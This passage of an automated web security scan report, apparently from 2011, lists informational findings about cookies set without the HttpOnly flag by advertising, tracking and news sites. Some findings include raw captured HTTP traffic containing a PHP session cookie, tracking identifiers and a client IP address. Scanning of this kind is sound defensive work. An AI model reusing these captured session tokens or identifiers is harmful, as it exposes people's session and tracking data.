The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.122. http://pix04.revsci.net/K05539/b3/0/3/1003161/248479722.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/K05539/b3/0/3/1003161/248479722.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4jOheHIMHvC1v6FY5BAFiE2lu64fTXbwk32ILzQmufPZU63k5ONu2v/oPlIcMX/OHb51RFGwBYRw8fBVw0aNn868fOK8Dy9ww0TAIgHMczr3EMFgE8G017VVOyoVGkKxE0WjD8BB8/8jj7sUVGGL6xcF5RPx2WkBN8zk37CtNk/eV2CIxCQ2+JihmeXWoV8B/zkMCkb253a/s9fWcA/Ac3jvLxuOpf0YYQ1ffPryJv8e6p0YW3MPo64WfrrrSXUixD/B8/jeBSwjLhtCVtSnBfdqT1qu883COe0/8WdCdGlIU/ksRDzOZxNnJM9lxwQ9eG+QsGGQjBBEYqh7tKGXRjeSvtm6iX76M18hiqcN77QiO2ORzJDpmafb6GXgJFxs57Blu6FJE7Lxxvz+cR7ly9rR/cBwF2yuXBmEaXk57rx4zwucslSWZbI38ZvvrDPi1yajK5LbOlZKjwlutxiIJ9z8GT/AIqemlToJ0BpKctDBmQ9inrRUNw5FyUG4WiJiREYYVJ2esG6VGdRGE2Ea0U677R9xpsw/NumWG9xFT0kImfMjeKrvtMcWSCCz7ICM9rGdSFf53yFYxdBuB40JKcNZIS42rPWKfbd1iPVGQLrew0hnm6EnL7MGkXyNHK+Lsq3WYjcfe4GRiVvM2dZaP4xyryEJ7l4RxCfzY+x4qm7vuOYXkL3nTFiJfoxFpz0Mtd8FYH9cfOo3PD/Tzs6AFsm7l06fPeimD1JRaMTNnmTaGdCJcZrQDHLfiAp8es3jILvbTkxsAOVy0LGdlYw5mlpUMAElqgKp3SUdFfjXX6mHdqI2Pcnt; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:37 GMT; Path=/
rtc_IF8h=MLvv+TMxJohmprbr/FOrg2mN7iry9EJR8nXXGp85AnkmlCJ3Dn9/8UQviHrUnHZTstC6vjeHIYOASHlo5yCPSON/Kzv+DA66ZWoDWmvfpTXDttj/l+nlKjcyTGSAoOAUCV576jhKnqvTusSYHas5qXZDkI6xS9wt9LApNogiFtwZ7SpzZMhc7jIXMasR6wtEYgUXUx8MJpjmx/xvfZdXqh3zjf/RrSBzApv/gUzkHzES/IpGTdkJqQGQiF+W3z9F9Rxqsgmkb3o5WC5E7roIcBM+TtpxMvj1qvcu+u/ZVcmg4SqsLEJ0B0KBPUCt3U2HP4oczq8bMwY5uzZFU7Lwq9oHwEAmKvlbxi7sWFx/6SL9iRRb2Dt7Fn0DGLZlLA8gSCfldM4bsJV1HlNvkG6Pt6xK3kTf0bvU6J2fNbpCwrCNbiBuVcriSwtqN2H2BYoZhaJU46bKMHR9q6X71cr7Dl3wqz+rdQn7YomUWFm6uLaTZLuynUKKvr5E3ESnRiRSjJWwGa1PGymnQ7smiHRkrgJ2lxs2USXunhEejw9d/SBKnKCaXybXGm3HgZFD2+JafTAV3XQTwewH9RDAVQ6oDlz+pI9/BVqQBe1ra5BuLADzbrud23T+HFJ3uZRzsKjx8pjhyN8vG+wbpTj9B9LIdYj8u10Fq9SxELvjczDwCb4TW6SeaVbW2eIfElYwVgTmxkbkl59rqDicqUNSqh5U4goElNsz+ILnGcivjCIaEApEUgvR5koxszteVYtlzGRh+tTWp6Q6veEPmlmhGmvUWMKpfxqdAhmsPSjiwhO0Coh+OLN9q4HeGXipUJ+0mKXrWXgR6slQUCcKQrTr1e9hvijz4sj2xN5mhDsGCqF8DTo/Dgv2BjbOU1de3wlIzAn1wsniQU/ghTvQQY+6Rp4+vqTuJN9Whf4GQNsMamhaDatlyWn+vSuGskT8PO0LzQHDU0D+Yt7rpT/CSNusy8FvAIElyCESMQWaE7WuRzEpHspHMogThPEg4fy6KZnz4T7hZ48idKAHSNJiODjSEpU11qbB6VKVGOVvIVuxAKk0fy8ewE25EoGO1Zdd0H/YjRMb8ikhoZ+VQgysPwEndvKP1KRYlTNG/fC8BmwYI5QAikGI5BX7Bu7rAw3k5OJFtg+qz6qGxpF9xqng9FTwlIhIf/XEoPRabDi0X9LzTHuLFDYnKI6giiw+8n1rlmpNkdn//SGjRFpx0M/2xWh72CqM/Z+FZg7h4A7IKb2skR7VDvbGbFesDGJXtqWNCH/f9r7wlBY50bA6rhsvcVHY9e1g4iqN3+8ci0QZjwuWixZVThMOl0bn4LgXSq3M8gCeq52NR5A9jcWCDrf77Zb6n0hArKnQ676Qjir2+YwYGzncffOWxDeHip9MEOOw1kUIg9f870t4uhKGb/XXlGXkfBkEqtflnTGLJs9RgRKbYebjCfR3uRnhkHncREApkZY+TX6kGQjunSa7+Iqen8Kd/RLxGO/qZqd/UT/dLlgL1ikJ4ERkqjCZ0dsE0yMY9AYguNlwffDEHU2EEZDWxCUDja1yId9JnrPHGQnD+KbnQd5FtqURV9ta2inHVxDSfse/jo+nwXftvl+F1j13PNpUPSM2sBRbr1SbxxX1rM1KD1FtdAIVJJwwf3EdBq5YF3IgnlDNfbHJZWpPDhr98emNELqpMihUn67txBKkRvFAhKYxq8qcneVfGelvk1jbIusDcCcbHk4vDpwJlEpBC8yQ46PvKR3SCAD0QRLseNu+7kyXnwpkFbr3zdQlGT4nFNo+jhZLQF0UOoPQmdF+Ur70OoxBtsRnStn8QijXplzYA+62TY0+Ck1L1b9KsS9zBxMZj7GrN4Bj3rx4G3P/eEGKaqOws4a/dIKVV915/hd2cm2lJoeT8Sm+x+1pu2413qTHDtiBpzBb7JHzi70cpWXiWCIfZ7j+aTcn6muisNbIUI19WfOFfQQGwpEAiLMfGGqineuBOOG9FbJcxtrJzQSWMp4/xoy1bsX5t/+OIzCFwc3ZIM9PMORxTfH4TZ3rwPKUIJV4PDKMQkx4yk5mBJMfl7cbniztf70bGzq39fPiP5a+ipVGXgxI+xdgG7Scya+Bxi/cf1R0+V0LY9vPzHZhJFN4fdiPXKQaeQmYg9etY2oNP070WIj/ZCaKwkmNOBQqYmV2AVx1RDKE88Kg7Cry7DV/EFjUbSz75rXMdoEFmV3mUn9fsBB+kEa1j2oWrB8fijw5210ABpzyH3SWymEYRSQpZrH69ptTvNxKpXX9XuMeG4R8o+ZtV3jODgn7hTGlJndQh1xUAmO66keb7AhIl/lsPG4g8NUKol25yvS+qqhKWlgnghY5ZLvLmaQGDOOCekjGo/xljdVQsfbmRkNezRPaddqOV4NmZhxYMJC00V0oKzgSlEd6oBWLbEB5CS8dgQbploZy0vcq/QLlPSEZD+btkxUl0HK/5QMvnA/k2h8UyEbqEORNd3KQbPm3l+3snajYKzbD+PkpjmdpFWFgYvOvnMJfhEfy/gbFmPRzmUpet1Gg9/gCg0o+oB8dfO1vO8hKFOwVxFw0t5RoNMLxO3D3VB+xDtXSMeseQKjFVA9OADcjokWFlb0mqnobmTMihyriwtOoKaMPYeGcdgRNSitNpbyJnUXwcO0pXK2ON2BmQHLhD3OpUxNIhYoL7Wt+vhCNAKN6OXsXd/hHzjxQnCn2yq2LvvrcjWbp4KQH; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:37 GMT; Path=/
NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4df0b081&1&10592&4dcb7bc9&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:37:37 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.123. http://pixel.33across.com/ps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

33x_ps=u%3D7708659745%3As1%3D1304431102142%3Ats%3D1304431102142; Domain=.33across.com; Expires=Fri, 11-May-2012 11:49:38 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.124. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EMoAJe8kjVmM-5GL0ZmY8frRi58oyBABwwEB3QaB1QCa0aWJVAsQ8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAOw0DRsQnSk5SjiyMA; expires=Wed, 10-Aug-2011 11:38:11 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.125. http://privatemoneytalk.com/wp-content/plugins/wp-spamfree/js/wpsf-js.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://privatemoneytalk.com
Path:	/wp-content/plugins/wp-spamfree/js/wpsf-js.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lGemmlivtkpdgBpx=xxrqDlBtmdeogahz; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/plugins/wp-spamfree/js/wpsf-js.php HTTP/1.1
Host: privatemoneytalk.com
Proxy-Connection: keep-alive
Referer: http://privatemoneytalk.com/?utm_source=msn&utm_medium=cpc&utm_term=private%20equity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=de1b43854ac8584ac515dd5952657099; sbmg_footerShowAfter=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:35 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: lGemmlivtkpdgBpx=xxrqDlBtmdeogahz; path=/
Content-Type: application/x-javascript
Content-Length: 1526

// WP-SpamFree 2.1.1.2 JS Code :: BEGIN

// Cookie Handler :: BEGIN
function GetCookie( name ) {
   var start = document.cookie.indexOf( name + '=' );
   var len = start + name.length + 1;
   if
...[SNIP]...

14.126. http://r.turn.com/r/bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:40:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.127. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:34 GMT; Path=/
pf=WDvFewANz5aN8ro--w_16OWau98iyOvVBtELDm2CHBX3Y07UZZPNWkK0EEUc7vAIfR8HsN28iFo6HdZJoYg637PetD2cA8xvvUoLcxur2sY9fHKHYMFFN8lXedjo-9PSl7cxfV18_Sz5Ng8ld_X1HRD_Z0wavqycrsQiFm9QZ_cEiXIeYRMvKu7l5KMvI7vm5dIdkRDTWQbgsHbEqQ37nNUVLZ0Aao2DGLgHCvs2_7zryFKliROAgCua8ygDf1pakle_qtze5tuAztFdGBKVECTB7Xzn-K67XFaryRa1HZxI2I4ae6CgiuH5tIIfNklQtPVt9L7Re7DJQWcHmwQpjCrTXh7XKumV-55sx735V56Jk4XT225c3_swkSHYmMoPRdlNOnviq7ipDvEZZ28_V5Fbphl8v0SeqcE1X29Q-XyrU8sC-NXPyqnKzoVqupwvxUtMxmzso7-ONZHGiWUGKIB5A9jubvG7JBvQXHiT1KdKWNG3ES2yEoYLCL7aUl8asmh83Bb_ySNRje2rNa0JxJcm9v4jeIQaPDoq3ACAJUl7IbOZHAHBMdmXe3UBRvsYdSrxi9Ecxa8kZThzZO6aeaas-roJj2Q-EkNpkXZbbvVeMLxvS4wRCkwyiayF00GI87TrIFafDjcHfusIoBCt22M89fvyKULVFnbtZFl9IUsQMSIRccJ6LX18XE1Nig_UUM1LGzqpcEk-rCFc1h0gpIm4Jd_QzLPdPOtdCEBAr8-8Upa6arFOpzab1pE0nDFPJkwT2KZhbD0CfG9KxUTYwAFaSuXROCWsvv1Xz_lvc5qDt8mPl3WKPA4r9Z1gJfOmbqLNFcfz6PEd-FrnEa4vrIqD8lkDUeWN7s4a9OueTLFISSSIDOlXxHejUMi7IABVrusAKookKb0pVS3987apnl6V-rQ-B6QHbtXcTAYqkWjgVeaX3klJElZGLoYa-ZuDh0Rayp3OOR_oU3ir4FomV_sy9RDK5uLzRDwQH4f7LIcJgVM65M6j7w5NDkyKKdRFf9BQS5tHIpXFtO5hdEHLwCf--aHQI9IDIlxI42NaIlUstjD2A4WMWerhztm-_a52YMN7bn25_9xS91STZcx-i0-bRhoYC7RhcSIMsIQ7o0TqwXhB0ipLjKZAXfISS2P-JyYO4jfdwozjhGCHarNmQ5BqLyG2YANF-FI5msFkFMG8UVACbcQT2qm5FtDkcuLLHIdQZhTfGyFVeET5DlWfImOBriO51iBaS4__ZMz5kSB3HnuOE2bKY8AnlZVaxKnjE3wXoM7fzLRqnlHVUJnantU17q7RnOwBeHgICWJsFQhc5wErZcKgnhVskq0bqyxhv_wjCGmN2gxKw0dhDnPYP_0Mmfi4j9yfMUwSdI9Lj7zJoKt8QnzKrSSc_RuX7K1PHnQtlNj8JmeKpHFW1PRfTb0fyYghIq-IITFkYc_uI9YSpJVpN2FNg5u_cdS3RjPCyL40JPKaH3V39NisQu1y367wTC7MmfceuL1HdWZa_yTHCCN0MTXDwR0tX3R7CB1nx3sRNCxKgOOP_38C_7cJoCDagfHqnmufnkMRoDa8dwQ; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:34 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.128. http://r.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:40 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.129. http://segments.adap.tv/data/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segments.adap.tv
Path:	/data/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

adaptv_unique_user_cookie="3547400152957574101__TIME__2011-05-12+04%3A39%3A28";Path=/;Domain=.adap.tv;Expires=Sun, 18-Jan-2043 13:26:08 GMT
audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1305874800,\"e\":1305874800,\"s\":[],\"a\":[]},\"9\":{\"f\":1307775600,\"e\":1307775600,\"s\":[528],\"a\":[]},\"8\":{\"f\":1307602800,\"e\":1307602800,\"s\":[1785],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Sun, 18-Jan-2043 13:26:08 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.130. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segs.btrll.com
Path:	/v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BR_MBBV=Ak2t54ZK4gSTAbNTSdI; expires=Thu, 10-May-2012 11:03:02 GMT; path=/; domain=.btrll.com
DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1NkAY9wyTj6xcgBj3C9OGFRjAGPa4VGL6aQAY9hhTkJlZg; expires=Sat, 11-May-2013 11:03:02 GMT; path=/; domain=.btrll.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.131. https://services.sungarddx.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://services.sungarddx.com
Path:	/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.132. http://tags.bluekai.com/site/668 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/668

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bklc=4dcbc695; expires=Sat, 14-May-2011 11:37:57 GMT; path=/; domain=.bluekai.com
bk=JzUPJLV5c/sVIHOf; expires=Tue, 08-Nov-2011 11:37:58 GMT; path=/; domain=.bluekai.com
bkc=KJh5pM2nxkWRhdcFfxIoSYermUH+qcO111n8MGjeezv+k09ROnKi0uSCUvxkZhpalDALQISVUAeTYQvCXhiw28bpw/4wKUTdprkFy1XPwWl7Qx46MEXmqzX57tlaFMeMBxdMy4FS9XKuPyXp1OgO86FL0gN+0S+ES4QtIXKWqN3t/X4uP02lynIWfrlqtFrmJSdK06sM8asFhPTzRa70biCgfGGKTPcLXOgnAkzlpUMrxYaCtSFBDNHBdbWXYpqjUFA6RfFrVwg3lN6TddJGIfmQ0wcvez4uENgbbgEjEUgdkFI/ypFqJ8a+m5PdLuPlcQ==; expires=Tue, 08-Nov-2011 11:37:58 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.133. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/topics/reference/timestopics/subjects/p/private_equity/index.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:15:57 GMT; path=/; domain=.nytimes.com
adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; path=/; domain=.nytimes.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.134. http://track.ft.com/track/track.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://track.ft.com
Path:	/track/track.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FTUserTrack=173.193.214.243.1305198170970491; path=/; expires=Sun, 09-May-21 11:02:50 GMT; domain=.ft.com
AYSC=_04dc_13USA_14USA_15us_17mid%2Batlantic_18washington_24north%2Bamerica_25high_26202_27PVT_99S_; Domain=.ft.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.135. http://translate.googleapis.com/translate_a/t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.googleapis.com
Path:	/translate_a/t

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=2acf7ee0ad804026:TM=1305205626:LM=1305205626:S=ipDBSJmxfVDAaQKy; expires=Sat, 11-May-2013 13:07:06 GMT; path=/; domain=translate.googleapis.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://securelab.digiware.net/?cat=8
Origin: http://securelab.digiware.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 1118

q=Rss%20Feed&q=Tweeter%20button&q=Acerca%20de&q=search&q=skip%20to%20content%20%E2%86%93&q=Home&q=Casos%20de%20uso&q=Uncategorized&q=Casos%20de%20uso&q=Fuga%20de%20informaci%C3%B3n%20por%20email%20%C2
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:07:06 GMT
Expires: Thu, 12 May 2011 13:07:06 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=2acf7ee0ad804026:TM=1305205626:LM=1305205626:S=ipDBSJmxfVDAaQKy; expires=Sat, 11-May-2013 13:07:06 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1311

["Rss Feed","Tweeter button","About","search","skip to content ...","Home","Use Cases","Uncategorized","Use Cases","Email information leak \x26quot;intentional?","\x3ca i=0\x3eby\x3c/a\x3e \x3ca i=1\x
...[SNIP]...

14.136. http://va.px.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://va.px.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

segments_p1="eJzjYuFo2czIxcWxZx+zwKX2K+9YACvmBhc=";Version=1;Path=/;Domain=invitemedia.com;Expires=Fri, 11-May-2012 11:49:38 GMT;Max-Age=31536000

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.137. https://virtualoffice.tuckerellis.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://virtualoffice.tuckerellis.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sslvpn_AOPortal_virtualoffice.tuckerellis.com=false; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.138. http://wt.o.nytimes.com/dcs3baftr1000008q5oxvjceo_4r9g/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wt.o.nytimes.com
Path:	/dcs3baftr1000008q5oxvjceo_4r9g/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My00MDM5Mjk1ODA4LjMwMTQ4ODUyAAAAAAAHAAAAmLwAANj0vk3W9L5NF74AAOdtyk3lbcpNNMEAAPFwyk3obcpNDb4AALxuyk3qbcpN+L0AAGzBy018vstNCr4AANZwyk2Hb8pND74AAHzBy018wctNAQAAAHhHAAB8wctNfL7LTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs3baftr1000008q5oxvjceo_4r9g/dcs.gif?&dcsdat=1305198972966&dcssip=topics.nytimes.com&dcsuri=/topics/reference/timestopics/subjects/p/private_equity/index.html&dcsqry=?inline=nyt-classifier&WT.co_f=173.193.214.243-4039295808.30148852&WT.vt_sid=173.193.214.243-4039295808.30148852.1305198204263&WT.tz=-5&WT.bh=6&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Private%20Equity%20News%20-%20The%20New%20York%20Times&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1046x964&WT.fi=Yes&WT.fv=10.2&WT.tv=1.0.7&WT.dl=0&WT.es=topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html&WT.cg_n=Times%20Topics&WT.z_gpt=Topic&WT.z_gpst=Subject&WT.z_gtn=Private%20Equity&WT.z_nyts=&WT.z_nytd=&WT.z_rmid=27fdc70e4ff84dbef4b4b43a&WT.rv=0&WT.mc_ev=&WT.vt_f_tlv=&WT.vt_f_tlh=1305198956&WT.vt_f_d=&WT.vt_f_s=&WT.vt_f_a=&WT.vt_f= HTTP/1.1
Host: wt.o.nytimes.com
Proxy-Connection: keep-alive
Referer: http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My00MDM5Mjk1ODA4LjMwMTQ4ODUyAAAAAAAGAAAAmLwAANj0vk3W9L5NF74AAOdtyk3lbcpNNMEAAPFwyk3obcpNDb4AALxuyk3qbcpN+L0AAGzBy018vstNCr4AANZwyk2Hb8pNAQAAAHhHAABswctNfL7LTQAAAAA-; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; nyt-m=A61A961B774C8275E676733D3F0E8B0E&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.12.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198972967:ss=1305198204263

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Thu, 12 May 2011 11:16:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcs3baftr1000008q5oxvjceo_4r9g/dcs.gif?dcsredirect=112&dcstlh=0&dcstlv=0&dcsdat=1305198972966&dcssip=topics.nytimes.com&dcsuri=/topics/reference/timestopics/subjects/p/private_equity/index.html&dcsqry=?inline=nyt-classifier&WT.co_f=173.193.214.243-4039295808.30148852&WT.vt_sid=173.193.214.243-4039295808.30148852.1305198204263&WT.tz=-5&WT.bh=6&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Private%20Equity%20News%20-%20The%20New%20York%20Times&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1046x964&WT.fi=Yes&WT.fv=10.2&WT.tv=1.0.7&WT.dl=0&WT.es=topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html&WT.cg_n=Times%20Topics&WT.z_gpt=Topic&WT.z_gpst=Subject&WT.z_gtn=Private%20Equity&WT.z_nyts=&WT.z_nytd=&WT.z_rmid=27fdc70e4ff84dbef4b4b43a&WT.rv=0&WT.mc_ev=&WT.vt_f_tlv=&WT.vt_f_tlh=1305198956&WT.vt_f_d=&WT.vt_f_s=&WT.vt_f_a=&WT.vt_f=
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My00MDM5Mjk1ODA4LjMwMTQ4ODUyAAAAAAAHAAAAmLwAANj0vk3W9L5NF74AAOdtyk3lbcpNNMEAAPFwyk3obcpNDb4AALxuyk3qbcpN+L0AAGzBy018vstNCr4AANZwyk2Hb8pND74AAHzBy018wctNAQAAAHhHAAB8wctNfL7LTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"

14.139. http://wt.o.nytimes.com/dcsc32upj10000c58n7kgpaeo_8i3g/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wt.o.nytimes.com
Path:	/dcsc32upj10000c58n7kgpaeo_8i3g/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My00MDM5Mjk1ODA4LjMwMTQ4ODUyAAAAAAAGAAAAmLwAANj0vk3W9L5NF74AAOdtyk3lbcpNNMEAAPFwyk3obcpNDb4AALxuyk3qbcpN+L0AAMa+y03GvstNCr4AANZwyk2Hb8pNAQAAAHhHAADGvstNxr7LTQAAAAA-; path=/; expires=Sun, 09-May-2021 11:04:38 GMT

